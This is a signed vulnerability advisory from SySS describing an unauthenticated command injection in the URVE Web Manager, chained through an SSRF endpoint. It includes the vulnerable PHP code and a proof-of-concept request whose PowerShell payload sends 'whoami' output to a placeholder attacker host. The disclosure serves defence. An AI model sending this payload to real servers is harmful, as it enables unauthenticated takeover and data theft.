-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-034 
Product:                   URVE Web Manager 
Manufacturer:              Eveo 
Affected Version(s):       27.02.2025
Tested Version(s):         27.02.2025
Vulnerability Type:        OS Command Injection (CWE-78) 
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-04-09
Solution Date:             2025-06-02
Public Disclosure:         2025-07-17
CVE Reference:             CVE-2025-36846
Author of Advisory:        Stefan Krause, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The URVE Web Manager is the administrative web application for the URVE
Smart Office suite by Eveo. This suite includes tools like a room booking
and a desk sharing application.

The manufacturer describes the Smart Office product as follows (see [1]):

"Smart Office is a system of modern applications and user interfaces that
support office management, hybrid work model and teamwork."

Due to the exposure of several back-end endpoints to unauthenticated users,
the application is vulnerable to unauthenticated remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The application exposes an endpoint to unauthenticated users that includes
an OS command injection. The endpoint takes an input parameter that is
passed directly into the shell_exec() function of PHP.

In the tested version, the endpoint was limited to use by requests coming
from localhost.

This endpoint can be requested at /_internal/pc/vpro.php.

The code can be seen below:

	<? 
		error_reporting(0);
		if(!in_array($_SERVER['REMOTE_ADDR'], ['127.0.0.1', '::1', 'localhost']))
			die('error');
		
		[REDACTED]

		$cmd = "powershell.exe $software_path -computerName $ip -operation $operation -username $usr -password $pass";
		//var_dump($cmd);
		$data = shell_exec($cmd);
		//var_dump($data);
		//echo("<b>Wake remote PC:</b> $mac $ip $mask $port");
		echo("<b>vPro request sent.<b>");
	?>

The limitation of requests by localhost can be circumvented by using another
exposed endpoint.

The endpoint /_internal/redirect.php exposes a server-side request forgery
(SSRF), as described in SYSS-2025-035[3].

This SSRF can be used to send a request to the vpro.php endpoint.

Both endpoints are accessible without authentication. Therefore, this
security vulnerability can be exploited without any valid credentials.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The PoC code uses a combination of both endpoints to perform remote code
execution. In the example, PowerShell is used to execute the command
"whoami" on the target machine and send the result to the attacker system
via an HTTP request.

All content between <@burp_urlencode><@/burp_urlencode> has to be
URL-encoded.

The PoC is left unencoded for better readability.

GET /_internal/redirect.php?url=<@burp_urlencode>https://127.0.0.1:444/_internal/pc/vpro.php?mac=0&ip=0&operation=0&usr=0&pass=0%3bpowershell.exe+-c+<@burp_urlencode>'$user = (whoami); $url = ''http://<attacker-ip>/''+$user; (New-Object System.Net.WebClient).DownloadFile($url,''test.txt'')'<@/burp_urlencode><@/burp_urlencode> HTTP/1.1
Host: <target-system>:<port of web manager>
Connection: keep-alive

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Block all endpoints under /_internal/ from external requests.
Update to latest version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-04-01: Vulnerability discovered
2025-04-09: Vulnerability reported to manufacturer
2025-06-02: Patch released by manufacturer
2025-07-17: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for URVE Smart Office
    https://smartoffice.expert/en/
[2] SySS Security Advisory SYSS-2025-034
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-034.txt
[3] SySS Security Advisory SYSS-2025-035
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Krause of SySS GmbH.

E-Mail: stefan.krause@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Krause.asc
Key ID: 0x2B2BA6FDD6E172F3
PGP-Fingerprint: 88C8 13B9 FA6A 2FE6 B6D8  7226 2B2B A6FD D6E1 72F3 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en


-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEiMgTufpqL+a22HImKyum/dbhcvMFAmh3m7wACgkQKyum/dbh
cvOspBAAkERVlc1595FP1N1F9S0fCwLMQijkoHao5ERHmMZa3GlZil2B9mm6Y7/f
/hH3go2AZzvA+YJD1JRviZ5OsVoHzcfSXsLCWhlApuKIYz0SwPsGLfSpTB5FRN/e
fV1r6VIjkxsCWO43B2JHQsp/lge0ZN6c+e2SmcpwLeVx3f/dQH91BIgSsBztaSIC
tlzy2zTJSH2SPhlCRVGJLxkIpqh5ogEfBnLZOrtZepn1llaDhOIAIwmKKdJZ6OwD
+FRvQRmp0OBPXap39yAPRpD470thlbBl01N7nQfHHNMRxX7JHsBGXsdxDPNjKSqe
GOVt991h8NTv4dG5vaPntJnixis2rXEeUnNMhK2NuUZooI/ecey3aBbx2a/fHjex
X0S0KzNKBb+p8ksQH1b8CK2Fx9rSKLzjMLax25BdROJXN4gsaf6AqQcAFd2frw/J
5uDKgB78+e3Q2fjZ/V0Mn4iQQv6Ymf5HN8ctbDNDL4urysq3/ut98zVUaS9XPfi/
yBfsDFtD1HpvyVZCTf0uHBpZSmTyzcB+CBhK5pxwhiGNW7R4ufFMx4IwEwjxC1To
Ke3eaZ/qJBru8feUuSQEyjpPZBqQXjCslKXtCUjq+zLPwa/rfl5WlGUOKlF42NKC
wtM0K09MoP57TDhepqiRzB/ClfBDmgMCVc1IG5j7HqlDOsQzdLQ=
=KEuM
-----END PGP SIGNATURE-----